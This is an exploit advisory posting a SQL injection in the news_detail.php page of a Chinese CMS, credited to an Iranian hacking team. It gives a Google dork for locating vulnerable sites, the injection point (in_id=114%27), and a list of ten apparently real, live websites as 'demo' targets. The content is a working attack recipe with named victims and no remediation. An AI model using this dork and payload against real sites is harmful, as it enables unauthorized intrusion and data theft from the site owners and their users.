######################
# Exploit Title : 云脉网络 CMS SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://yt-c.net/
# Google Dork : intext:" 技术支持:云脉网络"
# Date: 22 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
######################
# Vulnerable File : news_detail.php
# Request Method: GET
# Describe : Search dork and select Target. Put /news_detail.php?in_id=114%27 After url such as :
# http://site.com/news_detail.php?in_id=114%27
# You See Error And You Can Inject ... Ok
#
# Demo :
# http://www.ytjieqiang.com/news_detail.php?in_id=114%27
# http://www.ytyuyang.com.cn/news_detail.php?in_id=114%27
# http://www.weiyupcb.com/news_detail.php?in_id=114%27
# http://www.dongfangwgysy.com/news_detail.php?in_id=114%27
# http://rongchao.cn/news_detail.php?in_id=114%27
# http://www.yt-taida.com/news_detail.php?in_id=114%27
# http://www.yhgjmy.cn/news_detail.php?in_id=114%27
# http://www.yanco.cn/news_detail.php?in_id=114%27
# http://www.senyue.cn/en/news_detail.php?in_id=114%27
# http://www.guotaihouse.com/news_detail.php?in_id=114%27
#
#
######################
# discovered by : Net Hacker
######################